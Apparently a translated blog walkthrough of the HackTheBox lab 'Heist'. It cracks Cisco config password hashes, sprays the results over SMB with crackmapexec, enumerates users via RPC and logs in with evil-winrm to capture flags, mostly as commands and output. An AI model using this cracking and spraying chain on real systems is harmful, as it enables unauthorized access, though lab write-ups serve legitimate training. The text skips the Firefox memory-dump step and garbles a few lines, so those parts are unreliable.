banner
毅种循环

毅种循环

请将那贻笑罪过以逐字吟咏 如对冰川投以游丝般倾诉

HackTheBox-Heist

Heist brought new concepts that I had never seen before on HTB, while still maintaining a simple difficulty level. I will start by finding a Cisco configuration on the website that contains some usernames and password hashes. After recovering the passwords, I will discover one that can obtain RPC access, which I will use to find more usernames. One of these usernames and one of the original passwords are used to obtain a WinRM session on Heist. From there, I will notice that Firefox is running and dump the process memory to find the original website's password, which is also the administrator password for the box.

Information Gathering#

└─# nmap -sV 10.129.96.157
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 03:13 EST
Nmap scan report for 10.129.96.157
Host is up (0.39s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.35 seconds

Ports 80 and 445 are open, let's check port 80.
image
This page is a login page, I tried weak passwords with no success and found an option to log in as a guest.
image

Password Cracking#

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0Â mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh

I obtained a Cisco network configuration file.
Among them:

username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408

These are the passwords for two accounts:

enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91

This looks like a credential for a security key.

CMD5 could not crack the password, I retrieved a Cisco password cracker and found an online cracking webpage.
The URL is: https://www.ifm.net.nz/cookbooks/passwordcracker.html


image
I obtained the password for user rout3r as $uperP_@_ssword and the admin password as Q4)sJu\Y8qz*A3?d.
Now I still need to crack a password for the security key type.
Using John to automatically crack the ciphertext:

─# john 2.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:12 2.09% (ETA: 03:44:05) 0g/s 29115p/s 29115c/s 29115C/s jose1980..jornel
stealth1agent    (?)   
1g 0:00:01:25 DONE (2022-12-07 03:35) 0.01171g/s 41059p/s 41059c/s 41059C/s stealth323..stealth1967
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

I obtained another password, stealth1agent.
Now I have two accounts and three passwords:

User
rout3r 
admin
Password
$uperP@ssword
Q4)sJu\Y8qz*A3?d
stealth1agent

Lateral Movement on Port 445#

With these passwords, and since port 445 is also open, I will directly try crackmapexec for lateral movement.
image
It was quite embarrassing that none of the accounts were able to be cracked. I looked back at the web and added the guest account Hazard to the list.
Let's run it again.

└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent

SMB 10.129.96.157 445 SUPPORTDESK [+] SupportDesk\Hazard
I obtained an SMB account, Hazard.
Based on previous experience, it is also possible to lateral move via winRM, so I will scan port 5985.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-07 04:00 EST
Nmap scan report for 10.129.96.157
Host is up (0.41s latency).
PORT     STATE SERVICE
5985/tcp open  wsman
Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds


I tried to connect using that password, but found I couldn't connect.
Let's check the SMB shares.

smbmap -H 10.10.10.149 -u hazard -p stealth1agent
─# smbmap -H 10.129.96.157 -u hazard -p stealth1agent
[+] IP: 10.129.96.157:445       Name: 10.129.96.157                                   
        Disk                                                    Permissions Comment
        ----                                                    ----------- -------
        ADMIN$                                                  NO ACCESS   Remote Admin
        C$                                                      NO ACCESS   Default share
        IPC$                                                    READ ONLY   Remote IPC

I found I could connect to IPC with read-only permissions.

image

SMB User Enumeration#

https://www.freebuf.com/sectool/175208.html
https://www.heikeblog.com/archives/661.html This article provides a detailed introduction to several uses of the impacket package.
image

└─# python3 lookupsid.py hazard:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.129.96.157
[*] StringBinding ncacn_np:10.129.96.157[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)

After obtaining these new users, I will go back and supplement the initial users and try to crack them again.

└─# crackmapexec smb 10.129.96.157 -u user.txt -p pass.txt --continue-on-success
SMB         10.129.96.157   445    SUPPORTDESK      [*] Windows 10.0 Build 17763 x64 (name:SUPPORTDESK) (domain:SupportDesk) (signing:False) (SMBv1:False)
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\rout3r:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\admin:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Hazard:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Hazard:stealth1agent 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Administrator:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Guest:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\support:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [+] SupportDesk\Chase:Q4)sJu\Y8qz*A3?d 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Chase:stealth1agent STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:$uperP@ssword STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:Q4)sJu\Y8qz*A3?d STATUS_LOGON_FAILURE 
SMB         10.129.96.157   445    SUPPORTDESK      [-] SupportDesk\Jason:stealth1agent STATUS_LOGON_FAILURE

The --continue-on-success parameter allows crackmapexec to continue running instead of stopping after one attempt. I enumerated a new user, SupportDesk\Chase)sJu\Y8qz*A3?d.

winRM Connection#

┌──(root㉿kali)-[~/Desktop]
└─# evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d'
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                 
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                   
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
*Evil-WinRM* PS C:\Users\Chase\Documents>

The new user chase is able to connect.

Obtain User Flag#

Evil-Win-WM* PS C:\Users\Chase\Documents> cd ../desktop
*Evil-Win-WM* PS C:\Users\Chase\desktop> dir
    Directory: C:\Users\Chase\desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/22/2019   9:08 AM            121 todo.txt
-ar---        12/9/2022   7:41 AM             34 user.txt
*Evil-Win-WM* PS C:\Users\Chase\desktop> type user.txt
d4a33ebeff5334ec5c96993941af64d8
*Evil-Win-WM* PS C:\Users\Chase\desktop>

Obtain Root Flag#

I found that there are many users on the current computer, but I cannot read others' desktops due to low permissions.
Let's check the todo.txt file I just found.

*Evil-Win-WM* PS C:\Users\Chase\desktop> type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.

It suggests three tasks:

1. Keep checking the issues list.
2. Fix the router config.
Done:
1. Restricted access for guest user.


Let's check the processes.

*Evil-Win-WM* PS C:\Users\Chase\desktop> ps
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
    468      18     1980       5272               368   0 csrss
    290      13     2224       5104               472   1 csrss
    357      15     3448      14572              2156   1 ctfmon
    251      14     3920      13316              3916   0 dllhost
    166       9     1880       9716       0.03   6616   1 dllhost
    614      32    29164      57988               960   1 dwm
   1498      58    23896      78852              5304   1 explorer
   1090      68   128468     205616       5.72   6264   1 firefox
    347      19    10144      38584       0.11   6444   1 firefox
    355      25    16396      38876       0.06   6716   1 firefox
    401      34    34604      92436       0.70   6840   1 firefox
    378      28    22020      58668       0.70   7020   1 firefox
     49       6     1792       4584               768   1 fontdrvhost
     49       6     1492       3808               776   0 fontdrvhost
      0       0       56          8                 0   0 Idle
    976      22     5800      14792               624   0 lsass
    223      13     3072      10308              3220   0 msdtc
      0      12      400      15056                88   0 Registry
    275      14     3096      15000              5448   1 RuntimeBroker
    145       9     1716       7524              5732   1 RuntimeBroker
    303      16     5636      17024              5804   1 RuntimeBroker
    663      32    19716      61648              5668   1 SearchUI
    550      11     5192       9632               608   0 services
    672      28    14788      51860              5576   1 ShellExperienceHost
    440      17     4792      23976              5032   1 sihost
     53       3      528       1100               268   0 smss
    471      22     5812      16264              2460   0 spoolsv
    201      12     1980       9592               332   0 svchost
    150       9     1812       11648               700   0 svchost
     85       5      928       3716               724   0 svchost
    860      20     6944      22496               744   0 svchost
    378      13    10684      14832              852   0 svchost
    868      16     5288      11672              856   0 svchost
    257      10     2016       7648               908   0 svchost
    286      13     4148       11276              1020   0 svchost
    140       7     1364       5620              1068   0 svchost
    126       16     4016       7832              1188   0 svchost
    184       9     1796       7440              1200   0 svchost
    229      12     2628      11208              1216   0 svchost
    430       9     2808       8828              1236   0 svchost
    154       7     1256       5540              1264   0 svchost
    231       9     2168       7512              1304   0 svchost
    367      17     4904      13864              1380   0 svchost
    172      10     1792       8012              1392   0 svchost
    353      14     4380      11480              1440   0 svchost
    163       9     3084       7628              1452   0 svchost
    255      15     3520       8512              1484   0 svchost
    305      11     1976       8740              1492   0 svchost
    191      12     2144      11888              1624   0 svchost
    320      10     2552       8328              1640   0 svchost
    163      11     2868       7356              1716   0 svchost
    161       8     1896       7052              1772   0 svchost
    129       7     1564       6216              1784   0 svchost
    409      32     8448      17000              1820   0 svchost
    196      11     1976       8040              1880   0 svchost
    239      11     2516       9604              1888   0 svchost
    171       9     1532       7176              2120   0 svchost
    332      18    14656      31224              2124   0 svchost
    167      12     4032      10820              2504   0 svchost
    181      22     2488       9796              2512   0 svchost
    462      20    12112      26688              2524   0 svchost
    261      13     2668       7892              2540   0 svchost
    376      15     9708      19304              2564   0 svchost
    133       9     1672       6484              2604   0 svchost
    136       8     1560       6096              2632   0 svchost
    126       7     1224       5264              2656   0 svchost
    205      11     2288       8296              2676   0 svchost
    233      14     4604      11740              2752   0 svchost
    169      10     2204      13200              2816   0 svchost
    209      12     1852       7416              2824   0 svchost
    265      19     3208      12000              2864   0 svchost
    464      17     3448      11820              3076   0 svchost
    193      15     6076      10004              3144   0 svchost
    382      23     3340      12184              3248   0 svchost
    423      48    13668      22296              3256   0 svchost
    211      11     2780      11836              4432   0 svchost
    145       8     1680       7432              4640   0 svchost
    187      12     2636      13236              4696   0 svchost
    169       9     4792      12192              4868   0 svchost
    300      15    12772      14740              4928   0 svchost
    251      14     3188      13740              4940   0 svchost
    228      12     3100      13560              5048   1 svchost
    365      18     5720      27008              5080   1 svchost
    122       7     1288       5520              6208   0 svchost
    115       7     1328       5192              6404   0 svchost
    264      14     3632      12648              6488   0 svchost
    225      12     3624      10940              6572   0 svchost
    321      20    10184      14620              6756   0 svchost
   1891       0      192        136                 4   0 System
    211      20     3976      12372              2036   1 taskhostw
    167      11     2788      10760              2720   0 VGAuthService
    142       8     1696       6844              2692   0 vm3dservice
    136       9     1820       7352              3056   1 vm3dservice
    384      22     9616      22104              2708   0 vmtoolsd
    236      18     5096      15288              5712   1 vmtoolsd
    171      11     1500       6860               492   0 wininit
    280      13     2816      12936               528   1 winlogon
    344      16     8920      18660              3196   0 WmiPrvSE
    812      27    52104      70388       1.78   4316   0 wsmprovhost

I found that all the processes are normal, but one Firefox process seems very out of place. Following the penetration testing mindset, I will try to check the browser configuration...

└─# evil-winrm -i 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
Evil-Win-WM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-Win-WM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-Win-WM* PS C:\Users\Administrator\Documents> cd C:\Users\Administrator\Desktop
*Evil-Win-WM* PS C:\Users\Administrator\Desktop> ls
    Directory: C:\Users\Administrator\Desktop
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        12/9/2022   7:41 AM             34 root.txt
*Evil-Win-WM* PS C:\Users\Administrator\Desktop> type root.txt
22479c36a38a8b34331942f57b066490
*Evil-Win-WM* PS C:\Users\Administrator\Desktop>
Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.